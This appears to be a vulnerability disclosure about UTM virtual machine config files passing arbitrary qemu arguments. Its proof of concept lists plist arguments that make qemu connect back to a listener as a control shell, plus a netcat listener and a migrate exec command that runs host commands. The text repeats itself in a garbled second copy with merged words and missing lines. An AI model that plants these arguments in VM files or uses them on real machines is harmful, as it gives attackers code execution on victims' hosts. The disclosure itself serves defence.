Summary
UTM’s configuration file allows arbitrary arguments to be supplied to qemu, including arguments that lead to execution of arbitrary code. The principal means of achieving this is through the -chardev and -mon arguments, which together open a channel for remote control of the qemu process over various transports including arbitrary TCP connections. It is a documented design decision that access to this control channel is equivalent to allowing arbitrary code execution on the qemu host. This can be achieved most easily by using the migrate command’s exec transport, but there are other commands and other arguments that can lead to arbitrary code execution or access by the VM to arbitrary files on the host.
UTM does not currently provide any warning that a given VM may have these behaviors, particularly VMs downloaded from the internet. Even without exploiting the lack of consent required to trigger a VM download and start, a basic phishing site serving a backdoored VM would be sufficient to induce users to import and launch the VM, exposing them to RCE by attackers.
Severity
Moderate - Results in arbitrary code execution on host if malicious VM is loaded.
Proof of Concept
Start with a basic Linux VM image, then modify it to remove all display devices (so it starts in headless mode, with no window to show that it is running), disable Hypervisor.Framework, and add the following arguments to its config.plist:
<key>QEMU</key>
<dict>
<key>AdditionalArguments</key>
<array>
<string>-chardev socket,id=mon1,host=localhost,port=4444,server=off,</string>
<string>-mon chardev=mon1,mode=readline</string>
This instructs qemu to launch the equivalent of a connect-back shell on VM launch, targeting localhost port 4444 over TCP. This could instead target an arbitrary IP/DNS name, or use e.g., the TLS/websocket options for a more secure remote shell.
To demonstrate the ability to use this as a true remote code execution vulnerability:
- Install UTM (
brew install --cask [email protected]).
- Download an e.g., Ubuntu VM and modify it as above. Using the URI handling vulnerability referenced above, this could have been initiated using a malicious link.
- In a terminal, run
nc -vl 4444
- Start the VM. This could have been initiated using a malicious link, since the name of the VM is known to the attacker.
- See the connect back from the qemu process in the netcat terminal.
- Send the command migrate "exec:" to run an arbitrary shell command. For example,
migrate "exec:open -a Calculator" will open Calculator.app.
Further Analysis
Desired behavior should include:
- Warn on VMs with custom arguments that were not directly added by the UTM edit window by the user of the current machine.
- Add a warning in the UTM VM editor’s argument tab that adding arguments is an advanced feature and you should not add arguments that you do not understand.
It is unlikely to be possible to confidently identify whether any given custom qemu argument is “safe” in the long run, so providing an allowlist of “safe” arguments is not recommended.
Timeline
Date reported: 01/05/2024
Date fixed: Tracked in the UTM project as issue 6252
Date disclosed: 04/05/2024
Phyxius Finder
Summary
UTM’s configuration file allows arbitrary arguments to be supplied to qemu, including arguments that lead to execution of arbitrary code. The principal means of achieving this is through the
-chardevand-monarguments, which together open a channel for remote control of the qemu process over various transports including arbitrary TCP connections. It is a documented design decision that access to this control channel is equivalent to allowing arbitrary code execution on the qemu host. This can be achieved most easily by using the migrate command’s exec transport, but there are other commands and other arguments that can lead to arbitrary code execution or access by the VM to arbitrary files on the host.UTM does not currently provide any warning that a given VM may have these behaviors, particularly VMs downloaded from the internet. Even without exploiting the lack of consent required to trigger a VM download and start, a basic phishing site serving a backdoored VM would be sufficient to induce users to import and launch the VM, exposing them to RCE by attackers.
Severity
Moderate - Results in arbitrary code execution on host if malicious VM is loaded.
Proof of Concept
Start with a basic Linux VM image, then modify it to remove all display devices (so it starts in headless mode, with no window to show that it is running), disable Hypervisor.Framework, and add the following arguments to its config.plist:
This instructs qemu to launch the equivalent of a connect-back shell on VM launch, targeting localhost port 4444 over TCP. This could instead target an arbitrary IP/DNS name, or use e.g., the TLS/websocket options for a more secure remote shell.
To demonstrate the ability to use this as a true remote code execution vulnerability:
brew install --cask [email protected]).nc -vl 4444migrate "exec:open -a Calculator"will open Calculator.app.Further Analysis
Desired behavior should include:
It is unlikely to be possible to confidently identify whether any given custom qemu argument is “safe” in the long run, so providing an allowlist of “safe” arguments is not recommended.
Timeline
Date reported: 01/05/2024
Date fixed: Tracked in the UTM project as issue 6252
Date disclosed: 04/05/2024